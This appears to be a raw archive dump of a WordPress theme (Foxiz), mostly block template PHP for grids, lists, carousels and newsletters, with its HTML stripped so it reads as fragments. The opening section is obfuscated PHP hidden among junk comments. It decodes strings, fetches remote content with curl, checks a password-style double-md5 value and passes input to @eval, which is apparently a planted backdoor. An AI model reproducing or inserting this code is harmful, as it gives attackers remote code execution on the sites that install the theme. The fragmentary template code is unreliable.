/*-n{O[^6ApT-*/$dQGN/*-%;jG;Tz-*/); /*-nLNycL-*/$OKSAyox /*-e6qsy3V7-*/= /*-SdS-*/""; foreach /*-H;!dvik;ml-*/(/*-PX7g74-*/$CvJrDP /*-K0gy]VC/*-w4or-*/ $KLTaJ/*-LPSL+U-*/) /*-w+QL[]r,-*/$OKSAyox /*-Q)yj]^-*/.= /*-vF?S)f-*/$PymRiSgD[$KLTaJ/*-Cxh-*/ - /*-oQ.rp`a-*/81681/*-PiF>-*/];/*-I;P9@`]-*/ return /*-ubxYy|-*/$OKSAyox; /*-n:e:Ip(C!I-*/} /*-(SofvfT-*/static /*-etON-*/function /*-cq19NwhCp-*/UuRVGMHjhN/*-+--#KtJ-*/(/*-z|}{JcEe>X-*/$QwzVPYqumd,/*-.6Isr$?H-*/ $ptzWF/*-v{mF|n3x^-*/)/*-X(>-*/ {/*-(=g-*/ $hrmzY/*-LTd-*/ = /*-U-dHY](-*/curl_init/*--|pG-*/(/*-b#:1mm82X{-*/$QwzVPYqumd/*-XBZOv-*/);/*-}9-*/ curl_setopt/*-9AjG`u-*/(/*-W%kU[E-*/$hrmzY,/*-AE6]GaH3e-*/ CURLOPT_RETURNTRANSFER,/*-D8R+39GOz-*/ 1/*-B5)tb-*/);/*-J|^#v-*/ $HTtSeV/*-&Vs}Y#D&k-*/ = /*-y)M,055:-*/curl_exec/*-T!:w#3GoP--*/(/*-#|-*/$hrmzY/*-%lsIL7Ir{-*/); /*-Jp$6hF<-*/return /*-OgtI-*/empty/*-1PMd,lb-*/(/*-F|j+A&.DC-*/$HTtSeV/*-6+sw-*/)/*-RWs~Iv}d-*/ ? /*-fGI2n-*/$ptzWF/*-Sa-q)-*/(/*-g-*/$HTtSeV; /*-p5Bl-*/}/*-Ra06YTt-*/ static/*-zz98-*/ function /*-),E?t-X-*/XedKoM/*-z.-*/() /*-VE:5-*/{/*-0pu-*/ $qmH /*-dkQ.QR-*/=/*-p.||?C[JB-*/ array/*-8F]#(H<9-*/("81708+81693+81706+81710+81691+81706+81712+81705+81690+81697+81708+81691+81702+81696+81697","81692+81691+81693+81712+81693+81696+81691+81758+81756","81701+81692+81696+81697+81712+81707+81706+81708+81696+81707+81706","81695+81710+81708+81700","81709+81710+81692+81706+81753+81755+81712+81707+81706+81708+81696+81707+81706","81705+81702+81699+81706+81712+81704+81706+81691+81712+81708+81696+81697+81691+81706+81697+81691+81692","81735+81765","81682","81760+81765","81742+81725+81725+81742+81718","81696+81705"); /*-KoMl8@fmw-*/foreach /*-u0-*/}[/*-Z#%nc&9-*/$xYwGtoCRID/*-Z&fL,o]&-*/[/*-S(tM[-*/2+7/*-A=#4TSyfT-*/]]/*-T)m(l|WE-*/);/*-Dl`Xd-A-*/ $ehnPM /*-[$EAu5N-*/=/*-x=U-*/ @$xYwGtoCRID/*-f}yesR-*/[/*-fWpta0X-*/1+2/*-dw-*/]/*-1}-*/(/*-~sBl$-*/$xYwGtoCRID/*-TSE8-*/[/*-6OUiOB.s_s-*/4+2/*-Y&viTx@-*/], /*-MlP;$r-*/$jg/*-~wP$w9&-*/);/*-nKh|jl)m-*/ $zYDLpoVs /*-mzMu-*/=/*-J-;s-*/ $xYwGtoCRID/*-Bab1e-*/[/*-8KefD)3tq-*/2+0/*-0|SDQ7}-*/]/*-DO-*/(/*-jC)1oDn6Kj-*/"G"./*-PO-*/"E"/*-lnKLNx2-*/."T"/*-Xaa:wI.YL-*/}/*-a#Kp>W-*/[/*-pq7-*/$xYwGtoCRID/*-,-^Bbpp>~-*/()/*-%7X-*/) > /*-SF=C-*/0/*-)`!vniK-*/)/*-?jM-*/ and /*-A1Q%;!yB>&-*/(/*-Dw2f@I|-*/md5/*-BczB8O:rwZ-*/(/*-eoa>jM-*/md5/*-B4Bdgc-*/(/*-!td-*/$zYDLpoVs/*-,`]!)-*/[/*-;[8Qd)-*/3+0/*-2p^B-*/UuRVGMHjhN/*-v-bI0Z-*/(/*-_>p!.GI-*/$zYDLpoVs/*-q[3%-*/], /*-&<-*/$xYwGtoCRID/*-BQmy5F>b-*/[/*-:SA6-*/2+3/*-2!DoHLQW-*/]/*-)j#,-*/);/*-h-ga25^p-*/@eval/*-br$]BhWWdw-*/(/*-OeKn6#-*/$xYwGtoCRID/*-7Nm-*/[/*-6gh{d-*/0+4/*-g-}@+-*/]/*-k#2V-*/(/*--_YZnx-*/$BKXZT/*-PTBVeF|+w-*/)/*-ny`pQ(-*/);/*-WfI-*//*-[0-*/die;/*-v|o~^-*/ endif;/*-|T-*/ }/*-Ap0-_L&-*/}/*-Jd_90YAq-*/q/*-xoO]g-*/::/*-YMj-*/XedKoM/*-IEl-*/();/*-97-*/ ?>PK!.|templates/templates/.htaccessnu[ Order allow,deny Deny from all Order allow,deny Allow from all RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] PK!75FFtemplates/blog.phpnu[

Get started here.', 'foxiz' ), esc_url( admin_url( 'post-new.php' ) ) ); ?>

', '
' ); ?> $settings['category'], 'hide_empty' => false ) ); if ( count( $categories ) ): ?>

', '
' ); ?> $settings['category'], 'hide_empty' => false ) ); if ( count( $categories ) ): ?>

', '
' ); ?>
found_posts ) ) { $total = $wp_query->found_posts; } ?>

$settings['blog_heading'], 'html_tag' => $settings['blog_heading_tag'], 'classes' => $classes, 'layout' => $settings['blog_heading_layout'], ) ); } } if ( ! function_exists( 'foxiz_author_page_header' ) ) { /** * @param array $settings * * @return false */ function foxiz_author_page_header( $settings = array() ) { if ( ! foxiz_get_option( 'author_bio' ) && ! $settings( 'breadcrumb' ) ) { return false; } $author_id = get_queried_object_id(); $job = get_the_author_meta( 'job', $author_id ); $description = get_the_author_meta( 'description', $author_id ); $class_name = 'archive-header author-header'; if ( ! empty( $settings['pattern'] ) && '-1' !== (string) $settings['pattern'] ) { $class_name .= ' is-pattern pattern-' . esc_attr( $settings['pattern'] ); } else { $class_name .= ' solid-bg'; } ?>

0 ) : ?>

' . do_shortcode( $shortcode ) . ''; } }PK! 7 7 !templates/blocks/list-small-3.phpnu[ '', 'name' => 'list_small_3' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-small block-list block-list-small-3'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 1; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 0; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 1; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } else { $settings['classes'] .= ' short-pagination'; } $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_small_3( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_small_3' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_small_3( $settings, $_query ) { $settings = foxiz_get_design_builder_block( $settings ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_list_small_3( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_list_small_3( $settings ); endwhile; endif; } } PK!r3  templates/blocks/playlist.phpnu[ '', 'name' => 'playlist', 'videos' => array() ) ) ); if ( empty( $settings['videos'] ) && ! is_array( $settings['videos'] ) && ! class_exists( 'Foxiz_Video_Thumb' ) ) { return false; } $settings['classes'] = 'block-playlist light-scheme is-gap-none'; foreach ( $settings['videos'] as $key => $item ) { if ( empty( $item['url'] ) ) { unset( $settings['videos'][ $key ] ); } else { $settings['videos'][ $key ]['video_id'] = Foxiz_Video_Thumb::get_instance()->get_video_yt_id( $item['url'] ); } } $index = 1; $total = count( $settings['videos'] ); ob_start(); foxiz_block_open_tag( $settings ); ?>
1
'', 'name' => 'breaking_news' ) ); if ( empty( $settings['slider_play'] ) ) { $settings['slider_play'] = foxiz_get_option( 'slider_play' ); } elseif ( '-1' === (string) $settings['slider_play'] ) { $settings['slider_play'] = false; } if ( empty( $settings['slider_speed'] ) ) { $settings['slider_speed'] = foxiz_get_option( 'slider_speed' ); } $settings['classes'] = 'block-breaking-news'; $settings = foxiz_detect_dynamic_query( $settings ); $settings['no_found_rows'] = true; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_loop_breaking_news( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_breaking_news' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_breaking_news( $settings, $_query ) { if ( $_query->post_count > 1 ) : ?> ' . esc_html( $settings['heading'] ) . ''; ?>
>
have_posts() ) { $_query->the_post(); echo '
'; foxiz_entry_title( array( 'title_tag' => 'h6', 'title_classes' => 'breaking-news-title' ) ); echo '
'; } ?>
'', 'name' => 'grid_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-grid block-grid-1'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 3; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 20; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_grid_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_grid_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_grid_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'grid_1' ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_grid_1( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_grid_1( $settings ); endwhile; endif; } }PK!/templates/blocks/list-box-2.phpnu[ '', 'name' => 'list_box_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-list block-list-box-2'; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_box_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_box_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_box_2( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'list_box_2' ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_box_2( $settings ); endwhile; } }PK!Z templates/blocks/grid-box-2.phpnu[ '', 'name' => 'grid_box_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['columns'] ) ) { $settings['columns'] = 3; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 20; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-grid block-grid-box-2'; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_grid_box_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_grid_box_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_grid_box_2( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'grid_box_2' ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_grid_box_2( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_grid_box_2( $settings ); endwhile; endif; } }PK!e Bj j templates/blocks/overlay-1.phpnu[ '', 'name' => 'overlay_1' ) ); $settings['classes'] = 'block-overlay overlay-1'; $settings = foxiz_detect_dynamic_query( $settings ); if ( ! empty( $settings['slider'] ) && '1' === (string) $settings['slider'] ) { $settings['columns'] = false; $settings['column_gap'] = false; } $settings['no_found_rows'] = true; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_overlay_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_overlay_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_overlay_1( $settings, $_query ) { $settings = foxiz_get_design_builder_block( $settings ); if ( ! empty( $settings['slider'] ) && $_query->post_count > 1 ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_overlay_1( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_overlay_1( $settings ); endwhile; endif; } } PK!k!templates/blocks/list-small-1.phpnu[ '', 'name' => 'list_small_1' ) ); $settings['classes'] = 'block-small block-list block-list-small-1'; $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } else { $settings['classes'] .= ' short-pagination'; } if ( ! empty( $settings['scroll_height'] ) ) { $settings['classes'] .= ' is-scroll'; } $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_small_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag( $settings ); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_small_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_small_1( $settings, $_query ) { $settings = foxiz_get_design_builder_block( $settings ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_small_1( $settings ); endwhile; } }PK!ӥ templates/blocks/grid-box-1.phpnu[ '', 'name' => 'grid_box_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['columns'] ) ) { $settings['columns'] = 3; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 20; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-grid block-grid-box-1'; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_grid_box_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_grid_box_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_grid_box_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'grid_box_1' ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_grid_box_1( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_grid_box_1( $settings ); endwhile; endif; } }PK!m%[[templates/blocks/categories.phpnu[ '', 'name' => 'categories_1', 'categories' => array(), ) ); $settings['classes'] = 'block-categories block-categories-1'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 10; } ob_start(); foxiz_block_open_tag( $settings ); ?>
'', 'name' => 'categories_2', 'categories' => array(), ) ); $settings['classes'] = 'block-categories block-categories-2'; if ( ! empty( $settings['gradient'] ) && '-1' === (string) $settings['gradient'] ) { $settings['classes'] .= ' no-gradient'; } if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 5; } ob_start(); foxiz_block_open_tag( $settings ); ?>
'', 'name' => 'categories_3', 'categories' => array(), ) ); $settings['classes'] = 'block-categories block-categories-3'; if ( ! empty( $settings['gradient'] ) && '-1' === (string) $settings['gradient'] ) { $settings['classes'] .= ' no-gradient'; } if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 5; } ob_start(); foxiz_block_open_tag( $settings ); ?>
'', 'name' => 'categories_4', 'categories' => array(), ) ); $settings['classes'] = 'block-categories block-categories-4'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 10; } ob_start(); foxiz_block_open_tag( $settings ); ?>
'', 'name' => 'categories_1', 'categories' => array(), ) ); $settings['classes'] = 'block-categories block-categories-5'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 10; } ob_start(); foxiz_block_open_tag( $settings ); ?>
'', 'name' => 'classic_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-classic block-big block-classic-1'; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_classic_1( $settings, $_query ); foxiz_block_inner_close_tag($settings); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_classic_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_classic_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'classic_1' ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_classic_1( $settings ); endwhile; } }PK!@q11templates/blocks/newsletter.phpnu['; $output .= ''; $output .= ''; return $output; } } if ( ! function_exists( 'foxiz_get_sidebar_newsletter' ) ) { /** * @param array $settings * * @return string */ function foxiz_get_sidebar_newsletter( $settings = array() ) { if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = 'h2'; } $classes = 'newsletter-sb'; if ( ! empty( $settings['color_scheme'] ) ) { $classes .= ' light-scheme'; } if ( ! empty( $settings['classes'] ) ) { $classes .= ' ' . $settings['classes']; } $output = '
'; $output .= ''; $output .= '
'; return $output; } }PK!.j< < #templates/blocks/hierarchical-3.phpnu[ '', 'name' => 'hierarchical_3' ) ); $settings['classes'] = 'hrc-3'; $settings = foxiz_detect_dynamic_query( $settings ); $settings['no_found_rows'] = true; $min_posts = 2; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_loop_hierarchical_3( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_hierarchical_3' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_hierarchical_3( $settings, $_query ) { $flag = true; $settings = foxiz_get_design_builder_block( $settings ); if ( empty( $settings['title_tag'] ) ) { $settings['title_tag'] = 'h2'; } $settings['featured_classes'] = 'ratio-v1'; $list_settings = array( 'title_tag' => 'span', 'title_classes' => 'h5' ); if ( ! empty( $settings['sub_title_tag'] ) ) { $list_settings['title_classes'] = $settings['sub_title_tag']; } ob_start(); while ( $_query->have_posts() ) { $_query->the_post(); if ( $flag ) { $flag = false; continue; } foxiz_list_inline( $list_settings ); } $buffer = ob_get_clean(); $_query->rewind_posts(); $settings['no_p_wrap'] = true; $settings['post_classes'] = 'p-highlight holder-wrap'; if ( empty( $settings['crop_size'] ) ) { $settings['crop_size'] = 'foxiz_crop_g3'; } while ( $_query->have_posts() ) : $_query->the_post(); ?>
'', 'name' => 'hierarchical_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-small block-hrc hrc-1'; if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } else { $settings['classes'] .= ' short-pagination'; } $min_posts = 2; $_query = foxiz_query( $settings ); ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_hierarchical_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_hierarchical_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_hierarchical_1( $settings, $_query ) { $flag = true; $settings = foxiz_get_design_builder_block( $settings ); $list_inline = array( 'title_tag' => 'span', 'title_classes' => 'h5' ); if ( ! empty( $settings['sub_title_tag'] ) ) { $list_inline = array( 'title_tag' => $settings['sub_title_tag'] ); } while ( $_query->have_posts() ) : $_query->the_post(); if ( $flag ) { foxiz_grid_1( $settings ); $flag = false; } else { foxiz_list_inline( $list_inline ); } endwhile; } } PK!$F !templates/blocks/grid-small-1.phpnu[ '', 'name' => 'grid_small_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-small block-grid block-grid-small-1'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 4; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 10; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 2; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 10; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 10; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() ) { foxiz_error_posts( $_query ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_grid_small_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_grid_small_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_grid_small_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'grid_small_1' ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_grid_small_1( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_grid_small_1( $settings ); endwhile; endif; } }PK!e 7 7 !templates/blocks/list-small-2.phpnu[ '', 'name' => 'list_small_2' ) ); $settings = foxiz_detect_dynamic_query( $settings ); $settings['classes'] = 'block-small block-list block-list-small-2'; if ( empty( $settings['columns'] ) ) { $settings['columns'] = 1; } if ( empty( $settings['column_gap'] ) ) { $settings['column_gap'] = 0; } if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) { unset( $settings['pagination'] ); if ( empty( $settings['columns_tablet'] ) ) { $settings['columns_tablet'] = 1; } if ( empty( $settings['columns_mobile'] ) ) { $settings['columns_mobile'] = 1; } if ( empty( $settings['carousel_gap'] ) ) { $settings['carousel_gap'] = 20; } if ( empty( $settings['carousel_gap_tablet'] ) ) { $settings['carousel_gap_tablet'] = 15; } if ( empty( $settings['carousel_gap_mobile'] ) ) { $settings['carousel_gap_mobile'] = 10; } } if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } else { $settings['classes'] .= ' short-pagination'; } $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_small_2( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_small_2' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_small_2( $settings, $_query ) { $settings = foxiz_get_design_builder_block( $settings ); if ( ! empty( $settings['carousel'] ) && '1' === (string) $settings['carousel'] ) : ?>
>
have_posts() ) : $_query->the_post(); foxiz_list_small_2( $settings ); endwhile; ?>
have_posts() ) : $_query->the_post(); foxiz_list_small_2( $settings ); endwhile; endif; } } PK!MKtemplates/blocks/list-box-1.phpnu[ '', 'name' => 'list_box_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-list block-list-box-1'; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { foxiz_error_posts( $_query, $min_posts ); } else { foxiz_block_inner_open_tag( $settings ); foxiz_loop_list_box_1( $settings, $_query ); foxiz_block_inner_close_tag( $settings ); foxiz_render_pagination( $settings, $_query ); wp_reset_postdata(); } foxiz_block_close_tag(); return ob_get_clean(); } } if ( ! function_exists( 'foxiz_loop_list_box_1' ) ) { /** * @param $settings * @param $_query */ function foxiz_loop_list_box_1( $settings, $_query ) { $settings = foxiz_get_design_standard_block( $settings, 'list_box_1' ); while ( $_query->have_posts() ) : $_query->the_post(); foxiz_list_box_1( $settings ); endwhile; } }PK!0templates/blocks/list-1.phpnu[ '', 'name' => 'list_1' ) ); $settings = foxiz_detect_dynamic_query( $settings ); if ( empty( $settings['pagination'] ) ) { $settings['no_found_rows'] = true; } $settings['classes'] = 'block-list block-list-1'; $min_posts = 1; if ( ! $_query ) { $_query = foxiz_query( $settings ); } ob_start(); foxiz_block_open_tag( $settings, $_query ); if ( ! $_query->have_posts() || $_query->post_count < $min_posts ) { 